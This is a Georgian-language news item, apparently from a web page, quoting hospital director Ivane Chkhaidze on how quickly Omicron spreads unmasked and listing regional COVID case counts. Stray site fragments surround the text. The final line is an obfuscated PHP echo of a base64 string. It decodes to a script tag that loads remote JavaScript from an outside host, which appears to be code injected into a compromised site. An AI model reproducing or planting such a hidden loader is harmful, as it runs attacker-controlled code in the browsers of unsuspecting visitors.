celsiusi
ავერსი საქკაბელი
 
იაშვილის სახელობის ბავშვთა ცენტრალური საავადმყოფოს სამედიცინო დირექტორის ივანე ჩხაიძის განცხადებით, "ომიკრონის" შემთხვევაში ინფიცირებისთვის უნიღბოდ ყოფნის 2-3 წუთიც საკმარისია. ამის შესახებ მან „რუსთავი 2“-თან კოვიდ-ინფიცირების გაზრდილ მაჩვენებელზე და ეპიდემიოლოგიურ მდგომარეობაზე საუბრისას განუცხადა.
 
ივანე ჩხაიძე მოსახლეობას დიდი თანყრილობებისგან თავის არიდებას ურჩევს და ვაქცინაციისკენ მოუწოდებს.
 
"თავიდან ავიცილოთ თავშეყრა, თავიდან ავიცილოთ დახურულ სივრცეში ადამიანების თავყრილობები, განსაკუთრებით ეს ეხება კვების ობიექტებს, ვინაიდან აქ უნიღბოდ ყოფნის 2-3 წუთიც საკმარისია "ომიკრონის" შემთხვევაში ინფიცირებისთვის. ასე რომ სიფრთხილის ზომები ახლა უნდა იყოს გაათმაგებული და კიდევ ერთხელ ვუსვამთ ხაზს ვაქცინაციის მნიშვნელობას, განსაკუთრებით, ბუსტერ დოზის მნიშვნელობას. ბუსტერ დოზა ახლა რეალური, ეფექტური და ალბათ ერთადერთი შესაძლებლობაა თავი დავიცვათ ინფიცირებისგან, მძიმე შემთხვევებისგან, გარდაცვალებისაგან,“ - აცხადებს ივანე ჩხაიძე.
 
შეგახსენებთ, რომ დღეს ქვეყანაში გამოვლენილი ინფიცირების 23 134 ახალი შემთხვევიდან: თბილისში გამოვლენილია 10 667 შემთხვევა, აჭარაში - 2 207, იმერეთში - 3 566, ქვემო ქართლში - 1 379, შიდა ქართლში - 1 050, გურია - 572, სამეგრელო - ზემო სვანეთში - 1 611, კახეთი - 1 014, მცხეთა-მთიანეთში - 497, სამცხე-ჯავახეთში - 449, რაჭა-ლეჩხუმი და ქვემო სვანეთში - 122.
816
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");